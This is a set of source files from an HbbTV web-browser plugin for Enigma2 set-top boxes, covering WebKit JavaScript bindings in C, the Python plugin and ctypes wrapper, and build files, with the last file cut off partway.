s_o_bindToCurrentChannel[] = \n \"HTMLObjectElement.prototype.bindToCurrentChannel = function() { \\\n c_o_bindToCurrentChannel(); \\\n document.getElementById(\\\"video\\\").style.visibility = \\\"hidden\\\"; \\\n}\";\n\nJSValueRef\nc_o_bindToCurrentChannel (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef *exception)\n{\n printf(\"%s - CALLED (argumentCount=%d)\\n\", __func__, argumentCount);\n\n for(unsigned int i = 0; i < argumentCount; i++)\n {\n printJSValueRef(ctx, arguments[i], exception);\n }\n\n if(g_Callback != NULL)\n g_Callback(100);\n\n return NULL;\n}\n\nchar s_o_getChannelConfig[] = \n\"HTMLObjectElement.prototype.getChannelConfig = function() {\\\n c_o_getChannelConfig(); \\\n\treturn new Channel();\\\n}\";\n\nJSValueRef\nc_o_getChannelConfig (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef *exception)\n{\n printf(\"%s - CALLED\\n\", __func__);\n return NULL;\n}\n\nchar s_o_play[] = \n\"HTMLObjectElement.prototype.play = function(speed) {\\\n c_o_play(speed, this.data); \\\n}\";\n\nJSValueRef\nc_o_play (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef *exception)\n{\n printf(\"%s - CALLED (argumentCount=%d)\\n\", __func__, argumentCount);\n\n /*for(unsigned int i = 0; i < argumentCount; i++)\n {\n printJSValueRef(ctx, arguments[i], exception);\n }*/\n\n if(argumentCount == 2) {\n float speed = JSValueToNumber(ctx, arguments[0], exception);\n char * url = NULL;\n int urlLen = JSValueToString(ctx, arguments[1], exception, &url);\n if(urlLen > 0) {\n char urlZdfBad[] = \"http://www.metafilegenerator.de/ondemand/zdf/hbbtv/geoloc_zdf-none/\";\n if(!strncmp(url, urlZdfBad, strlen(urlZdfBad)))\n {\n char urlZdf[] = \"mms://ondemand.msmedia.zdf.newmedia.nacamar.net/zdf/data/msmedia/zdf/\";\n int urlFixedLen = strlen(urlZdf) + strlen(url) - strlen(urlZdfBad);\n char urlFixed[urlFixedLen];\n strncpy(urlFixed, urlZdf, strlen(urlZdf));\n strncpy(urlFixed + strlen(urlZdf), url + strlen(urlZdfBad), strlen(url) - strlen(urlZdfBad));\n\n free(url);\n url = (char*)malloc(sizeof(char) * (urlFixedLen+2));\n strncpy(url, urlFixed, urlFixedLen);\n url[urlFixedLen - 3] = 'w';\n url[urlFixedLen - 2] = 'm';\n url[urlFixedLen - 1] = 'v';\n url[urlFixedLen] = '\\0';\n url[urlFixedLen+1] = '\\0'; // bug in libeplayer3 for mms\n }\n printf(\"%s:%s[%d] speed=%f url=%s [%d]\\n\", __FILE__, __func__, __LINE__, speed, url, urlLen);\n }\n }\n\n return NULL;\n}\n\nchar s_o_stop[] = \n\"HTMLObjectElement.prototype.stop = function() {\\\n c_o_stop(); \\\n}\";\n\nJSValueRef\nc_o_stop (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef *exception)\n{\n printf(\"%s - CALLED (argumentCount=%d)\\n\", __func__, argumentCount);\n\n for(unsigned int i = 0; i < argumentCount; i++)\n {\n printJSValueRef(ctx, arguments[i], exception);\n }\n\n return NULL;\n}\n\nchar s_o_release[] = \n\"HTMLObjectElement.prototype.release = function() {\\\n c_o_release(); \\\n}\";\n\nJSValueRef\nc_o_release (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef *exception)\n{\n printf(\"%s - CALLED (argumentCount=%d)\\n\", __func__, argumentCount);\n\n for(unsigned int i = 0; i < argumentCount; i++)\n {\n printJSValueRef(ctx, arguments[i], exception);\n }\n\n return NULL;\n}\n\nchar s_o_setFullScreen[] = \n\"HTMLObjectElement.prototype.setFullScreen = function(show) {\\\n c_o_setFullScreen(show); \\\n}\";\n\nJSValueRef\nc_o_setFullScreen (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef *exception)\n{\n printf(\"%s - CALLED (argumentCount=%d)\\n\", __func__, argumentCount);\n\n for(unsigned int i = 0; i < argumentCount; i++)\n {\n printJSValueRef(ctx, arguments[i], exception);\n }\n\n return NULL;\n}\n\nchar s_o_seek[] = \n\"HTMLObjectElement.prototype.seek = function(millis) {\\\n c_o_seek(millis); \\\n}\";\n\nJSValueRef\nc_o_seek (JSContextRef ctx, JSObjectRef function, JSObjectRef thisObject, \n size_t argumentCount, const JSValueRef arguments[], JSValueRef *exception)\n{\n printf(\"%s - CALLED (argumentCount=%d)\\n\", __func__, argumentCount);\n\n for(unsigned int i = 0; i < argumentCount; i++)\n {\n printJSValueRef(ctx, arguments[i], exception);\n }\n\n return NULL;\n}\n\n///////////////////////////////////77\n\n#ifdef GTK\nvoid registerJsFunctions(WebKitWebView* web_view, int (*fnc)(int type))\n#endif\n#ifdef DFB\nvoid registerJsFunctions(LiteWebView* web_view, int (*fnc)(int type))\n#endif\n{\n g_Callback = fnc;\n\n webkit_web_view_execute_script(web_view, s_o_getOwnerApplication);\n register_javascript_function(web_view, \"c_o_getOwnerApplication\", c_o_getOwnerApplication);\n\n webkit_web_view_execute_script(web_view, s_o_ApplicationManager);\n //register_javascript_function(web_view, \"c_o_ApplicationManager\", c_o_ApplicationManager);\n\n webkit_web_view_execute_script(web_view, s_o_ApplicationManager_createApplication);\n register_javascript_function(web_view, \"c_o_ApplicationManager_createApplication\", c_o_ApplicationManager_createApplication);\n\n webkit_web_view_execute_script(web_view, s_o_ApplicationManager_destroyApplication);\n register_javascript_function(web_view, \"c_o_ApplicationManager_destroyApplication\", c_o_ApplicationManager_destroyApplication);\n\n webkit_web_view_execute_script(web_view, s_o_ApplicationManager_show);\n register_javascript_function(web_view, \"c_o_ApplicationManager_show\", c_o_ApplicationManager_show);\n\n webkit_web_view_execute_script(web_view, s_o_ApplicationManager_hide);\n register_javascript_function(web_view, \"c_o_ApplicationManager_hide\", c_o_ApplicationManager_hide);\n\n webkit_web_view_execute_script(web_view, s_o_bindToCurrentChannel);\n register_javascript_function(web_view, \"c_o_bindToCurrentChannel\", c_o_bindToCurrentChannel);\n\n webkit_web_view_execute_script(web_view, s_o_play);\n register_javascript_function(web_view, \"c_o_play\", c_o_play);\n\n webkit_web_view_execute_script(web_view, s_o_stop);\n register_javascript_function(web_view, \"c_o_stop\", c_o_stop);\n\n webkit_web_view_execute_script(web_view, s_o_release);\n register_javascript_function(web_view, \"c_o_release\", c_o_release);\n\n webkit_web_view_execute_script(web_view, s_o_setFullScreen);\n register_javascript_function(web_view, \"c_o_setFullScreen\", c_o_setFullScreen);\n\n webkit_web_view_execute_script(web_view, s_o_seek);\n register_javascript_function(web_view, \"c_o_seek\", c_o_seek);\n\n}\n\n// This function can be used to force displaying hbbtvlib errors\n#ifdef GTK\nvoid registerSpecialJsFunctions(WebKitWebView* web_view)\n#endif\n#ifdef DFB\nvoid registerSpecialJsFunctions(LiteWebView* web_view)\n#endif\n{\n char scriptError[] = \"alert(hbbtvlib_lastError);\";\n webkit_web_view_execute_script(web_view, scriptError);\n}\n\n" }, { "alpha_fraction": 0.6226657032966614, "alphanum_fraction": 0.6370634436607361, "avg_line_length": 26.632652282714844, "blob_id": "b6121d8d1302a247a14952240c00d51382b2af66", "content_id": "05c7c921bb22fcc9c187507547934c463fa377fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7015, "license_type": "no_license", "max_line_length": 148, "num_lines": 245, "path": "/enigma2/HbbTv/plugin.py", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "from enigma import fbClass, eServiceReference, eTimer, iServiceInformation, getDesktop\r\nfrom Plugins.Plugin import PluginDescriptor\r\nimport subprocess\r\nfrom Tools.Directories import resolveFilename, SCOPE_PLUGINS\r\nfrom Screens.Screen import Screen\r\nfrom Components.ActionMap import ActionMap\r\nimport sys\r\nfrom iEveBrowser import iEveBrowser\r\n\r\ngUrl = \"\"\r\n\r\n###\r\n# This Screen is only active if the browser is fullscreen\r\nclass EveBrowser(Screen):\r\n # Pseudo Screen\r\n skin = \"\"\"<screen name=\"EveBrowser\" position=\"0,0\" zPosition=\"10\" size=\"1,1\" backgroundColor=\"transparent\" title=\"EveBrowser\" flags=\"wfNoBorder\">\r\n </screen>\r\n \"\"\"\r\n def __init__(self, session, url):\r\n Screen.__init__(self, session)\r\n \r\n #fbClass.getInstance().lock()\r\n \r\n self.eveBrowser = iEveBrowser()\r\n print \"a\"\r\n dSize = getDesktop(0).size()\r\n self.eveBrowser.setDimension(1280, 720)\r\n #self.eveBrowser.setDimension(dSize.width(), dSize.height())\r\n print \"b\"\r\n #self.eveBrowser.loadEveBrowser()\r\n print \"c\"\r\n if len(url) == 0:\r\n url = \"http://tv-html.irt.de/hbbtv/interop05/index.php\" #\"http://tv-html.irt.de/hbbtv/tests/\" #\"http://itv.ard.de/ardtext/\"\r\n self.eveBrowser.loadPage(url)\r\n print \"d\"\r\n #TODO: Add addionional keys for routing to browser\r\n self[\"eveBrowserActions\"] = ActionMap([\"OkCancelActions\", \"ColorActions\", \"DirectionActions\", \"NumberActions\"],\r\n {\r\n \"red\": self.keyRed,\r\n \"green\": self.keyGreen,\r\n \"yellow\": self.keyYellow,\r\n \"blue\": self.keyBlue,\r\n \"up\": self.keyUp,\r\n \"down\": self.keyDown,\r\n \"left\": self.keyLeft,\r\n \"right\": self.keyRight,\r\n \"ok\": self.keyOk,\r\n \"cancel\": self.keyCancel,\r\n \"1\": self.key1,\r\n \"2\": self.key2,\r\n \"3\": self.key3,\r\n \"4\": self.key4,\r\n \"5\": self.key5,\r\n \"6\": self.key6,\r\n \"7\": self.key7,\r\n \"8\": self.key8,\r\n \"9\": self.key9,\r\n \"0\": self.key0,\r\n }, -2)\r\n \r\n\r\n def show(self):\r\n self.eveBrowser.show()\r\n \r\n def keyCancel(self):\r\n self.eveBrowser.unloadEveBrowser()\r\n self.close()\r\n \r\n def keyRed(self):\r\n self.keyPressed(\"red\")\r\n \r\n def keyGreen(self):\r\n self.keyPressed(\"green\")\r\n \r\n def keyYellow(self):\r\n self.keyPressed(\"yellow\")\r\n \r\n def keyBlue(self):\r\n self.keyPressed(\"blue\")\r\n \r\n def keyOk(self):\r\n self.keyPressed(\"ok\")\r\n \r\n def keyUp(self):\r\n self.keyPressed(\"up\")\r\n \r\n def keyDown(self):\r\n self.keyPressed(\"down\")\r\n \r\n def keyLeft(self):\r\n self.keyPressed(\"left\")\r\n \r\n def keyRight(self):\r\n self.keyPressed(\"right\")\r\n \r\n def key1(self):\r\n self.keyPressed(\"1\")\r\n \r\n def key2(self):\r\n self.keyPressed(\"2\")\r\n \r\n def key3(self):\r\n self.keyPressed(\"3\")\r\n \r\n def key4(self):\r\n self.keyPressed(\"4\")\r\n \r\n def key5(self):\r\n self.keyPressed(\"5\")\r\n \r\n def key6(self):\r\n self.keyPressed(\"6\")\r\n \r\n def key7(self):\r\n self.keyPressed(\"7\")\r\n \r\n def key8(self):\r\n self.keyPressed(\"8\")\r\n \r\n def key9(self):\r\n self.keyPressed(\"9\")\r\n \r\n def key0(self):\r\n self.keyPressed(\"0\")\r\n \r\n def keyPressed(self, key):\r\n self.eveBrowser.keyPress(key, self.eveBrowser.KEY_TYPE_PRESS)\r\n self.eveBrowser.keyPress(key, self.eveBrowser.KEY_TYPE_RELEASE)\r\n\r\n###\r\n# This Screen displays the RED Button\r\nclass REDButton(Screen):\r\n\tskin = \"\"\"<screen name=\"REDButton\" position=\"50,50\" zPosition=\"10\" size=\"34,45\" backgroundColor=\"transparent\" title=\"REDButton\" flags=\"wfNoBorder\">\r\n\t\t<eLabel position=\"0,0\" size=\"34,45\" backgroundColor=\"#FF0000\" />\r\n\t</screen>\r\n\t\"\"\"\r\n\r\n\tdef __init__(self, session, url):\r\n\t\tScreen.__init__(self, session)\r\n\t\tself.session = session\r\n\t\tself.url = url\r\n\t\t\r\n\t\tself[\"redButtonActions\"] = ActionMap([\"SetupActions\", \"ColorActions\"],\r\n\t\t{\r\n\t\t\t\"red\": self.keyRed,\r\n\t\t\t#\"cancel\": self.close,\r\n\t\t}, -2)\r\n\t\r\n\tdef keyRed(self):\r\n\t\tself.session.open(EveBrowser, self.url)\r\n\r\nclass HbbTv():\r\n\t\r\n\tpid = \"\"\r\n\t\r\n\tdef __init__(self, session):\r\n\t\tself.session = session\r\n\t\t\r\n\t\t# This is a hack, instead we should register to the channel changed event\r\n\t\tself.poll_timer = eTimer()\r\n\t\tself.poll_timer.callback.append(self.__eventInfoChanged)\r\n\t\r\n\tdef __eventInfoChanged(self):\r\n\t\tif self.session is not None and self.session.nav is not None:\r\n\t\t\tfrom enigma import eServiceCenter\r\n\t\t\tserviceHandler = eServiceCenter.getInstance()\r\n\t\t\tref = self.session.nav.getCurrentService()\r\n\t\t\tif ref is not None:\r\n\t\t\t\td = ref.stream().getStreamingData()\r\n\t\t\t\tdemux = 0\r\n\t\t\t\tif d.has_key(\"demux\"):\r\n\t\t\t\t\tdemux = d[\"demux\"]\r\n\t\t\t\tif d.has_key(\"pids\"):\r\n\t\t\t\t\tfor pid in d[\"pids\"]:\r\n\t\t\t\t\t\tif pid is not None and len(pid) == 2 and pid[1] == \"pmt\":\r\n\t\t\t\t\t\t\tprint pid[0]\r\n\t\t\t\t\t\t\tif self.pid != pid[0]:\r\n\t\t\t\t\t\t\t\tself.pid = pid[0]\r\n\t\t\t\t\t\t\t\tself.checkForHbbTVService(demux, pid[0])\r\n\t\t\t\t\t\t\t\treturn\r\n\t\r\n\tdef checkForHbbTVService(self, demux, pmtPid):\r\n\t\tp = subprocess.Popen((resolveFilename(SCOPE_PLUGINS) + \"/SystemPlugins/HbbTv/bin/hbbtvscan-sh4\", \r\n\t\t\t\"-p\", str(pmtPid), \"-d\", \"/dev/dvb/adapter0/demux\" + str(demux)), stdout=subprocess.PIPE)\r\n\t\tout = p.communicate()[0]\r\n\t\tfor line in out.split(\"\\n\"):\r\n\t\t\tif line.startswith(\"URL\"):\r\n\t\t\t\telements = line.split(\"\\\"\")\r\n\t\t\t\turl = elements[1]\r\n\t\t\t\tprint url\r\n\t\t\t\ttype = elements[5]\r\n\t\t\t\tif type == \"AUTOSTART\":\r\n\t\t\t\t\t# Here we have to think about what we want \r\n\t\t\t\t\t# Either we load pages always in backgroudn so that hbbtv pages are displayed shortly after red button press\r\n\t\t\t\t\t# and that the red button option is only displayed after fully loading a page\r\n\t\t\t\t\t# Or we only start the browser after a user has pressed the red button \r\n\t\t\t\t\t# this would be wy more memory efficiant as tha browser doesnt have to \r\n\t\t\t\t\t# run always, but the first page will be displayed slower\r\n\t\t\t\t\t\r\n\t\t\t\t\t#self.session.open(EveBrowser, url)\r\n\t\t\t\t\t\r\n\t\t\t\t\t# For the moment the 2nd aproach seems to be a better solution\r\n\t\t\t\t\t#self.displayREDButton(url)\r\n\t\t\t\t\tglobal gUrl\r\n\t\t\t\t\tgUrl = url\r\n\t\t\t\t\t\r\n\t\t\t\t\treturn\r\n\t\r\n\tdef start(self, session):\r\n\t\tself.session = session\r\n\t\t#self.session.open(EveBrowser, \"http://www.google.de\")\r\n\t\t#self.displayREDButton(\"http://itv.ard.de/ardtext/\")\r\n\t\tself.poll_timer.start(5000)\r\n\t\r\n\tdef displayREDButton(self, url):\r\n\t\tself.session.open(REDButton, url)\r\n\r\nglobal_session = None\r\nglobal_hbbtv = None\r\n\r\ndef autostart(reason, **kwargs):\r\n\tprint \"B\"*60\r\n\tglobal global_session\r\n\tglobal global_hbbtv\r\n\tif reason == 0:\r\n\t\tprint \"starting hbbtv\"\r\n\t\tglobal_hbbtv = HbbTv(global_session)\r\n\r\ndef sessionstart(reason, session):\r\n\tprint \"A\"*60\r\n\tglobal global_session\r\n\tglobal global_hbbtv\r\n\tglobal_session = session\r\n\tglobal_hbbtv.start(global_session)\r\n\r\ndef main(session, **kwargs):\r\n\tglobal gUrl\r\n\tsession.open(EveBrowser, gUrl)\r\n\r\ndef Plugins(**kwargs):\r\n\treturn [\r\n\t\tPluginDescriptor(name=\"HbbTv\", description=\"HbbTv\", where = PluginDescriptor.WHERE_EXTENSIONSMENU, fnc=main),\r\n\t\tPluginDescriptor(name = \"HbbTv\", description = \"HbbTv\", where = PluginDescriptor.WHERE_AUTOSTART, fnc = autostart),\r\n\t\tPluginDescriptor(where = PluginDescriptor.WHERE_SESSIONSTART, fnc = sessionstart)\r\n\t]\r\n" }, { "alpha_fraction": 0.5468991994857788, "alphanum_fraction": 0.567054271697998, "avg_line_length": 32.0512809753418, "blob_id": "0d7b4d7bb0fc8e5841bb4cc6c0dc0a679668c830", "content_id": "974660c388f5a3c11b209baafa5f2c21a8773bed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2580, "license_type": "no_license", "max_line_length": 112, "num_lines": 78, "path": "/css_extension.c", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "\n#include <stdio.h>\n#include <stdlib.h>\n#include <sys/stat.h>\n#include <string.h>\n\n#include <webkit/webkit.h>\n#include <JavaScriptCore/JavaScript.h>\n\nvoid addLinkHighlighting(WebKitWebView* web_view) {\n\n // Well this is here a mess cause I tried different approaches to enable link higlighting\n // Each one has flaws up to performace drain.\n\n /*\n char scriptBackgroundColor[] = \"document.styleSheets[0].insertRule(\\'a{backgroundColor=\\\"#FF0000\\\";}\\',0);\";\n */\n\n /*\n char scriptBackgroundColor[] = \"var cssTags = document.getElementsByTagName(\\\"style\\\"); \\\n var cssTag = cssTags[0]; \\\n alert(cssTag.innerText); \\\n cssTag.innerText += \\'a { backgroundColor = \\\"#FF0000\\\"; }\\'; \\\n alert(cssTag.innerText);\";\n */\n\n /*\n char scriptBackgroundColor[] = \"var cssTag = document.createElement(\\\"style\\\"); \\\n cssTag.type = \\\"text/css\\\"; \\\n cssTag.innerHtml = \\'a { backgroundColor = \\\"#FF0000\\\"; }\\'; \\\n document.getElementsByTagName(\\\"head\\\")[0].appendChild(cssTag);\";\n */\n \n \n // cssTag.getElementsByTagName.innerHtml = \\'a { backgroundColor = \\\"#FF0000\\\" }\\';\n\n /*\n char scriptBackgroundColor[] = \"var a = document.getElementsByTagName(\\\"a\\\"); \\\n for(var i=0;i<a.length;i++){ \\\n a[i].style.backgroundColor = \\\"#FFA4A4\\\"; \\\n a[i].style.border = \\\"#FF0000 solid medium\\\"; \\\n a[i].style.borderRadius = \\\"15px\\\"; \\\n }\";\n */\n\n //webkit_web_view_execute_script(web_view, scriptBackgroundColor);\n\n //--------------------------\n\n /*\n char scriptHover[] = \"var cssTag = document.createElement(\\\"style\\\"); \\\n cssTag.setAttribute(\\\"type\\\",\\\"text/css\\\"); \\\n cssTag.innerHtml = \\'a:focus { backgroundColor = \\\"#00FF00\\\" }\\'; \\\n document.body.appendChild(cssTag);\";\n */\n\n /*\n char scriptHover[] = \"var a = document.getElementsByTagName(\\\"*\\\"); \\\n for(var i=0;i<a.length;i++) { \\\n a[i].onfocus = function() { \\\n this.style.backgroundColor= \\\"#87FF87\\\"; \\\n this.style.border = \\\"#00FF00 solid medium\\\"; \\\n this.style.borderRadius = \\\"15px\\\"; \\\n }; \\\n\t\t\t a[i].onblur = function() { \\\n this.style.backgroundColor= \\\"#FFA4A4\\\"; \\\n this.style.border = \\\"#FF0000 solid medium\\\"; \\\n this.style.borderRadius = \\\"15px\\\"; \\\n }; \\\n }\";\n */\n \n //webkit_web_view_execute_script(web_view, scriptHover);\n}\n\nvoid registerCssExtension(WebKitWebView* web_view)\n{\n addLinkHighlighting(web_view);\n}\n\n" }, { "alpha_fraction": 0.7117794752120972, "alphanum_fraction": 0.7218044996261597, "avg_line_length": 55.28571319580078, "blob_id": "ea762f7f0970f05fa142cd7a4430a9187206fafe", "content_id": "e7b8264094663131b693dd894c305ddac470d24c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 399, "license_type": "no_license", "max_line_length": 107, "num_lines": 7, "path": "/Makefile.am", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "lib_LTLIBRARIES = libevebrowser.la\n\nlibevebrowser_la_SOURCES = main.c js_extension.c js_debug.c\n\nlibevebrowser_la_CFLAGS = -std=c99 -DDFB $(FUSION_CFLAGS) $(PNG_CFLAGS) $(WEBKIT_CFLAGS) $(DFBINT_CFLAGS)\nlibevebrowser_la_CXXFLAGS = -std=c99 -DDFB $(FUSION_CFLAGS) $(PNG_CFLAGS) $(WEBKIT_CFLAGS) $(DFBINT_CFLAGS)\nlibevebrowser_la_LIBADD = $(FUSION_LIBS) $(PNG_LIBS) $(WEBKIT_LIBS) $(DFBINT_LIBS)\n\n\n\n\n\n" }, { "alpha_fraction": 0.6243036985397339, "alphanum_fraction": 0.6323499083518982, "avg_line_length": 27.198795318603516, "blob_id": "4a4b7613079903b76c9cd02e3345c715529d510a", "content_id": "9274d06a34761c117af0e104656b120d259ab40e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4847, "license_type": "no_license", "max_line_length": 124, "num_lines": 166, "path": "/enigma2/HbbTv/iEveBrowser.py", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "#killall rcS; killall enigma2; mount -tvfat /dev/sda1 /root; export LD_LIBRARY_PATH=/root/dfb2/lib:$LD_LIBRARY_PATH; enigma2\r\n\r\nimport os\r\nimport subprocess\r\nimport sys\r\nfrom Tools.Directories import resolveFilename, SCOPE_PLUGINS\r\n\r\nctypes = None\r\ntry:\r\n print \"Loading ctypes\"\r\n ctypes = __import__(\"_ctypes\")\r\n print \"Loading ctypes - Done\"\r\nexcept Exception, ex:\r\n print \"Loading ctypes - Failed (%s)\" % ex\r\n ctypes = None\r\n\r\nclass c_int(ctypes._SimpleCData):\r\n _type_ = \"i\"\r\n\r\nclass CFunctionType(ctypes.CFuncPtr):\r\n _argtypes_ = (c_int, )\r\n _restype_ = c_int\r\n _flags_ = ctypes.FUNCFLAG_CDECL\r\n\r\ngIEveBrowser = None\r\n\r\ndef _iEveBrowser__evtInfo(type):\r\n print \"_iEveBrowser__evtInfo:\", type\r\n if gIEveBrowser is not None:\r\n gIEveBrowser._evtInfo(type)\r\n return 0\r\n\r\n\r\n\r\nclass iEveBrowser():\r\n \r\n eveBrowser = None\r\n evtInfo = None\r\n \r\n def __init__(self):\r\n #os.system('export DFBARGS=\"pixelformat=ARGB,no-cursor,bg-none')\r\n os.environ[\"DFBARGS\"] = \"pixelformat=ARGB,no-cursor,bg-none,no-linux-input-grab,no-vt\"\r\n \r\n \r\n try:\r\n print \"Loading libevebrowser.so.0.0.0\"\r\n lib = resolveFilename(SCOPE_PLUGINS) + \"/SystemPlugins/HbbTv/lib/libevebrowser.so.0.0.0\"\r\n self.eveBrowser = ctypes.dlopen(lib, ctypes.RTLD_GLOBAL)\r\n print \"Loading libevebrowser.so.0.0.0 - Done\"\r\n except Exception, ex:\r\n print \"Loading libevebrowser.so.0.0.0 - Failed (%s)\" % ex\r\n try:\r\n print \"Loading libevebrowser.so.0.0.0\"\r\n lib = \"/usr/lib/libevebrowser.so.0.0.0\"\r\n self.eveBrowser = ctypes.dlopen(lib, ctypes.RTLD_GLOBAL)\r\n print \"Loading libevebrowser.so.0.0.0 - Done\"\r\n except Exception, ex:\r\n print \"Loading libevebrowser.so.0.0.0 - Failed (%s)\" % ex\r\n return\r\n \r\n try:\r\n print \"Registering functions\"\r\n self._setDimension = ctypes.dlsym(self.eveBrowser, \"setDimension\")\r\n self._loadEveBrowser = ctypes.dlsym(self.eveBrowser, \"loadEveBrowser\")\r\n self._unloadEveBrowser = ctypes.dlsym(self.eveBrowser, \"unloadEveBrowser\")\r\n self._loadPage = ctypes.dlsym(self.eveBrowser, \"loadPage\")\r\n self._show = ctypes.dlsym(self.eveBrowser, \"show\")\r\n self._hide = ctypes.dlsym(self.eveBrowser, \"hide\")\r\n self._keyPress = ctypes.dlsym(self.eveBrowser, \"keyPress\")\r\n self._setCallback = ctypes.dlsym(self.eveBrowser, \"setCallback\")\r\n print \"Registering functions - Done\"\r\n except Exception, ex:\r\n print \"Registering functions - Failed (%s)\" % ex\r\n return\r\n \r\n try:\r\n print \"Registering callback\"\r\n\r\n self._EVTFUNC = CFunctionType(__evtInfo)\r\n ctypes.call_function(self._setCallback, (self._EVTFUNC, ))\r\n print \"Registering callback - Done\"\r\n except Exception, ex:\r\n print \"Registering callback - Failed (%s)\" % ex\r\n return\r\n \r\n global gIEveBrowser\r\n gIEveBrowser = self\r\n return\r\n \r\n ###\r\n # Framebuffer dimension\r\n def setDimension(self, w, h):\r\n if self.eveBrowser is not None:\r\n ctypes.call_function(self._setDimension, (w, h, ))\r\n \r\n ###\r\n # Load the webpage\r\n # Will not display it if hidden\r\n def loadPage(self, url):\r\n if self.eveBrowser is not None:\r\n ctypes.call_function(self._loadPage, (url, ))\r\n \r\n ###\r\n # Loads the browser\r\n # Will not display it if hidden\r\n def loadEveBrowser(self):\r\n if self.eveBrowser is not None:\r\n ctypes.call_function(self._loadEveBrowser, ())\r\n \r\n ###\r\n # Unloads the browser, give me my mem back\r\n # Will not display it if hidden\r\n def unloadEveBrowser(self):\r\n if self.eveBrowser is not None:\r\n ctypes.call_function(self._unloadEveBrowser, ())\r\n \r\n ###\r\n # Display browser\r\n def show(self):\r\n if self.eveBrowser is not None:\r\n ctypes.call_function(self._show, ())\r\n \r\n ###\r\n # Hide browser\r\n def hide(self):\r\n if self.eveBrowser is not None:\r\n ctypes.call_function(self._hide, ())\r\n \r\n KEY_TYPE_PRESS = 0\r\n KEY_TYPE_RELEASE = 1\r\n KEY_TYPE_PRELL = 2\r\n \r\n ###\r\n # Routs keypresses to the browser\r\n # type is one of the above KEY_TYPE_*\r\n def keyPress(self, key, type):\r\n if self.eveBrowser is not None:\r\n ctypes.call_function(self._keyPress, (key, type, ))\r\n \r\n \r\n EVT_EVE_BROWSER_LOADED = 0\r\n EVT_PAGE_LOADED = 1\r\n\r\n EVT_PIG_CHANGED = 2\r\n \r\n EVT_C_O_BIND_TO_CURRENT_CHANNEL = 100\r\n \r\n ###\r\n # Called when webpage has been loaded\r\n # There are differnt possible approches, either e2 displays the red button, or the browser\r\n def _evtInfo(self, type):\r\n print \"_evtInfo:\", type\r\n if type == self.EVT_EVE_BROWSER_LOADED:\r\n pass\r\n elif type == self.EVT_PAGE_LOADED:\r\n pass\r\n elif type == self.EVT_PIG_CHANGED:\r\n pass\r\n else:\r\n pass\r\n \r\n if self.evtInfo is not None:\r\n self.evtInfo(type)\r\n \r\n def setEvtInfoCallback(self, fnc):\r\n self.evtInfo = fnc\r\n" }, { "alpha_fraction": 0.8064516186714172, "alphanum_fraction": 0.8064516186714172, "avg_line_length": 27.41666603088379, "blob_id": "ecf2564e79844960b88e6bf626d5f8988128f491", "content_id": "2127bf2aeb7435709be1c450bd5311060df6ea17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 341, "license_type": "no_license", "max_line_length": 98, "num_lines": 12, "path": "/js_debug.h", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "#ifndef JS_DEBUG_H_\n#define JS_DEBUG_H_\n\nvoid printJSStringRef(JSStringRef string);\n\nvoid printJSObjectRef(JSContextRef ctx, JSObjectRef argument);\n\nvoid printJSValueRef(JSContextRef ctx, JSValueRef argument, JSValueRef *exception);\n\nint JSValueToString(JSContextRef ctx, JSValueRef argument, JSValueRef *exception, char ** string);\n\n#endif\n" }, { "alpha_fraction": 0.7608142495155334, "alphanum_fraction": 0.7608142495155334, "avg_line_length": 18.649999618530273, "blob_id": "dbed298faa67d17c307571ee769194c64a76691a", "content_id": "bfa826498c982c0d1d5f3a48523ceb9c951c7d4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 393, "license_type": "no_license", "max_line_length": 72, "num_lines": 20, "path": "/js_extension.h", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "#ifndef JS_EXTENSIONS_H_\n#define JS_EXTENSIONS_H_\n\n#ifdef DFB\n#include <webkit/webkitdfb.h>\n#include <webkit/webview.h>\n#endif\n\n#ifdef GTK\nvoid registerSpecialJsFunctions(WebKitWebView* web_view);\n#endif\n\n#ifdef GTK\nvoid registerJsFunctions(WebKitWebView* web_view, int (*fnc)(int type));\n#endif\n#ifdef DFB\nvoid registerJsFunctions(LiteWebView* web_view, int (*fnc)(int type));\n#endif\n\n#endif\n" }, { "alpha_fraction": 0.7270668148994446, "alphanum_fraction": 0.7508493661880493, "avg_line_length": 18.622222900390625, "blob_id": "8ed52d95b9c5b0507010295259fb1ecfa95400a0", "content_id": "1b555cfdadc57a887ab60e266e26774f583dbbc2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "M4Sugar", "length_bytes": 883, "license_type": "no_license", "max_line_length": 68, "num_lines": 45, "path": "/configure.ac", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "AC_INIT(libevebrowser,0.0.1)\nAM_INIT_AUTOMAKE(libevebrowser,0.0.1)\n\ndnl AM_MAINTAINER_MODE provides the option to enable maintainer mode\nAM_MAINTAINER_MODE\n\nAM_INIT_AUTOMAKE($PACKAGE, $VERSION)\n\ndnl make aclocal work in maintainer mode\nAC_SUBST(ACLOCAL_AMFLAGS, \"-I m4\")\n\nAM_CONFIG_HEADER(config.h)\n\ndnl check for 